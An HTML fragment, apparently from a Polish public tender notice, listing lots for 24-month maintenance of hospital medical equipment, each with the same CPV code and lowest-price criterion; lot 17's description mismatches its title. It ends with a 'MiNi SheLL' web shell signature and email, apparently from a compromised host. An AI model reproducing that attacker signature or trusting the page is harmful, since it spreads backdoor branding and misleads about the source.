<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ŚWIADCZENIE USŁUG SERWISOWYCH W ZAKRESIE POMP INFUZYJNYCH W OKRESIE 24 MIESIĘCY, SZCZEGÓŁOWO OKREŚLONYCH W ZAŁĄCZNIKU NR 2 DO SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> USŁUGA SERWISOWA W ZAKRESIE ELEKTROKARDIOGRAFÓW.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ŚWIADCZENIE USŁUG SERWISOWYCH W ZAKRESIE ELEKTROKARDIOGRAFÓW W OKRESIE 24 MIESIĘCY, SZCZEGÓŁOWO OKREŚLONYCH W ZAŁĄCZNIKU NR 2 DO SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> USŁUGA SERWISOWA W ZAKRESIE KARDIOMONITORÓW.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ŚWIADCZENIE USŁUG SERWISOWYCH W ZAKRESIE KARDIOMONITORÓW W OKRESIE 24 MIESIĘCY, SZCZEGÓŁOWO OKREŚLONYCH W ZAŁĄCZNIKU NR 2 DO SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> USŁUGA SERWISOWA W ZAKRESIE KARDIOMONITORÓW.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ŚWIADCZENIE USŁUG SERWISOWYCH W ZAKRESIE KARDIOMONITORÓW W OKRESIE 24 MIESIĘCY, SZCZEGÓŁOWO OKREŚLONYCH W ZAŁĄCZNIKU NR 2 DO SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> USŁUGA SERWISOWA W ZAKRESIE PULSOKSYMETRÓW.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ŚWIADCZENIE USŁUG SERWISOWYCH W ZAKRESIE PULSOKSYMETRÓW W OKRESIE 24 MIESIĘCY, SZCZEGÓŁOWO OKREŚLONYCH W ZAŁĄCZNIKU NR 2 DO SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> USŁUGA SERWISOWA W ZAKRESIE URZĄDZEŃ STERYLIZACYJNYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ŚWIADCZENIE USŁUG SERWISOWYCH W ZAKRESIE URZĄDZEŃ STERYLIZACYJNYCH W OKRESIE 24 MIESIĘCY, SZCZEGÓŁOWO OKREŚLONYCH W ZAŁĄCZNIKU NR 2 DO SIWZ I ZAŁĄCZNIKU NR 3 DO SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> USŁUGA SERWISOWA W ZAKRESIE URZĄDZEŃ ANESTEZJOLOGICZNYCH I NEONATOLOGICZNYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ŚWIADCZENIE USŁUG SERWISOWYCH W ZAKRESIE URZĄDZEŃ ANESTEZJOLOGICZNYCH I NEONATOLOGICZNYCH W OKRESIE 24 MIESIĘCY, SZCZEGÓŁOWO OKREŚLONYCH W ZAŁĄCZNIKU NR 2 DO SIWZ I ZAŁĄCZNIKU NR 3 DO SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> USŁUGA SERWISOWA W ZAKRESIE RESPIRATORÓW.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ŚWIADCZENIE USŁUG SERWISOWYCH W ZAKRESIE RESPIRATORÓW W OKRESIE 24 MIESIĘCY, SZCZEGÓŁOWO OKREŚLONYCH W ZAŁĄCZNIKU NR 2 DO SIWZ I ZAŁĄCZNIKU NR 3 DO SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> USŁUGA SERWISOWA W ZAKRESIE RESPIRATORÓW.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ŚWIADCZENIE USŁUG SERWISOWYCH W ZAKRESIE RESPIRATORÓW W OKRESIE 24 MIESIĘCY, SZCZEGÓŁOWO OKREŚLONYCH W ZAŁĄCZNIKU NR 2 DO SIWZ I ZAŁĄCZNIKU NR 3 DO SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> USŁUGA SERWISOWA W ZAKRESIE RESPIRATORÓW.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ŚWIADCZENIE USŁUG SERWISOWYCH W ZAKRESIE RESPIRATORÓW W OKRESIE 24 MIESIĘCY, SZCZEGÓŁOWO OKREŚLONYCH W ZAŁĄCZNIKU NR 2 DO SIWZ I ZAŁĄCZNIKU NR 3 DO SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> USŁUGA SERWISOWA W ZAKRESIE RESPIRATORÓW I APARATÓW DO ZNIECZULANIA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ŚWIADCZENIE USŁUG SERWISOWYCH W ZAKRESIE RESPIRATORÓW I APARATÓW DO ZNIECZULANIA W OKRESIE 24 MIESIĘCY, SZCZEGÓŁOWO OKREŚLONYCH W ZAŁĄCZNIKU NR 2 DO SIWZ I ZAŁĄCZNIKU NR 3 DO SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> USŁUGA SERWISOWA W ZAKRESIE STANOWISKA DO PIELĘGNACJI NIEMOWLĄT.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ŚWIADCZENIE USŁUG SERWISOWYCH W ZAKRESIE STANOWISKA DO PIELĘGNACJI NIEMOWLĄT W OKRESIE 24 MIESIĘCY, SZCZEGÓŁOWO OKREŚLONYCH W ZAŁĄCZNIKU NR 2 DO SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> USŁUGA SERWISOWA W ZAKRESIE KARDIOTOKOGRAFÓW.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ŚWIADCZENIE USŁUG SERWISOWYCH W ZAKRESIE KARDIOTOKOGRAFÓW W OKRESIE 24 MIESIĘCY, SZCZEGÓŁOWO OKREŚLONYCH W ZAŁĄCZNIKU NR 2 DO SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> USŁUGA SERWISOWA W ZAKRESIE WANIEN.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ŚWIADCZENIE USŁUG SERWISOWYCH W ZAKRESIE WANIEN W OKRESIE 24 MIESIĘCY, SZCZEGÓŁOWO OKREŚLONYCH W ZAŁĄCZNIKU NR 2 DO SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> USŁUGA SERWISOWA W ZAKRESIE URZĄDZEŃ REHABILITACYJNYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ŚWIADCZENIE USŁUG SERWISOWYCH W ZAKRESIE URZĄDZEŃ REHABILITACYJNYCH W OKRESIE 24 MIESIĘCY, SZCZEGÓŁOWO OKREŚLONYCH W ZAŁĄCZNIKU NR 2 DO SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> USŁUGA SERWISOWA W ZAKRESIE URZĄDZEŃ LABORATORYJNYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ŚWIADCZENIE USŁUG SERWISOWYCH W ZAKRESIE POMP INFUZYJNYCH W OKRESIE 24 MIESIĘCY, SZCZEGÓŁOWO OKREŚLONYCH W ZAŁĄCZNIKU NR 2 DO SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> USŁUGA SERWISOWA W ZAKRESIE APARATÓW DO BADANIA SŁUCHU, AUDIOMETRU I TYMPANOMETRU.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ŚWIADCZENIE USŁUG SERWISOWYCH W ZAKRESIE APARATÓW DO BADANIA SŁUCHU, AUDIOMETRU I TYMPANOMETRU W OKRESIE 24 MIESIĘCY, SZCZEGÓŁOWO OKREŚLONYCH W ZAŁĄCZNIKU NR 2 DO SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> USŁUGA SERWISOWA W ZAKRESIE RESPIRATORA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ŚWIADCZENIE USŁUG SERWISOWYCH W ZAKRESIE RESPIRATORA W OKRESIE 24 MIESIĘCY, SZCZEGÓŁOWO OKREŚLONYCH W ZAŁĄCZNIKU NR 2 DO SIWZ I ZAŁĄCZNIKU NR 3 DO SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> USŁUGA SERWISOWA W ZAKRESIE APARATÓW DO ELEKTROCHIRURGII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ŚWIADCZENIE USŁUG SERWISOWYCH W ZAKRESIE APARATÓW DO ELEKTROCHIRURGII W OKRESIE 24 MIESIĘCY, SZCZEGÓŁOWO OKREŚLONYCH W ZAŁĄCZNIKU NR 2 DO SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> USŁUGA SERWISOWA W ZAKRESIE APARATÓW DO ELEKTROCHIRURGII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ŚWIADCZENIE USŁUG SERWISOWYCH W ZAKRESIE APARATÓW DO ELEKTROCHIRURGII W OKRESIE 24 MIESIĘCY, SZCZEGÓŁOWO OKREŚLONYCH W ZAŁĄCZNIKU NR 2 DO SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> USŁUGA SERWISOWA W ZAKRESIE REJESTRATORÓW HOLTER.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ŚWIADCZENIE USŁUG SERWISOWYCH W ZAKRESIE REJESTRATORÓW HOLTER W OKRESIE 24 MIESIĘCY, SZCZEGÓŁOWO OKREŚLONYCH W ZAŁĄCZNIKU NR 2 DO SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> USŁUGA SERWISOWA W ZAKRESIE REJESTRATORÓW HOLTER.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ŚWIADCZENIE USŁUG SERWISOWYCH W ZAKRESIE REJESTRATORÓW HOLTER W OKRESIE 24 MIESIĘCY, SZCZEGÓŁOWO OKREŚLONYCH W ZAŁĄCZNIKU NR 2 DO SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> USŁUGA SERWISOWA W ZAKRESIE STACJI UZDATNIANIA WODY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ŚWIADCZENIE USŁUG SERWISOWYCH W ZAKRESIE STACJI UZDATNIANIA WODY W OKRESIE 24 MIESIĘCY, SZCZEGÓŁOWO OKREŚLONYCH W ZAŁĄCZNIKU NR 2 DO SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> USŁUGA SERWISOWA W ZAKRESIE ECHOKARDIOGRAFU.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ŚWIADCZENIE USŁUG SERWISOWYCH W ZAKRESIE ECHOKARDIOGRAFU W OKRESIE 24 MIESIĘCY, SZCZEGÓŁOWO OKREŚLONYCH W ZAŁĄCZNIKU NR 2 DO SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> USŁUGA SERWISOWA W ZAKRESIE ULTRASONOGRAFU.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ŚWIADCZENIE USŁUG SERWISOWYCH W ZAKRESIE ULTRASONOGRAFU W OKRESIE 24 MIESIĘCY, SZCZEGÓŁOWO OKREŚLONYCH W ZAŁĄCZNIKU NR 2 DO SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> USŁUGA SERWISOWA W ZAKRESIE URZĄDZEŃ OKULISTYCZNYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ŚWIADCZENIE USŁUG SERWISOWYCH W ZAKRESIE URZĄDZEŃ OKULISTYCZNYCH W OKRESIE 24 MIESIĘCY, SZCZEGÓŁOWO OKREŚLONYCH W ZAŁĄCZNIKU NR 2 DO SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 28 <b>NAZWA:</b> USŁUGA SERWISOWA W ZAKRESIE URZĄDZEŃ HISTOPATOLOGICZNYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ŚWIADCZENIE USŁUG SERWISOWYCH W ZAKRESIE URZĄDZEŃ HISTOPATOLOGICZNYCH W OKRESIE 24 MIESIĘCY, SZCZEGÓŁOWO OKREŚLONYCH W ZAŁĄCZNIKU NR 2 DO SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com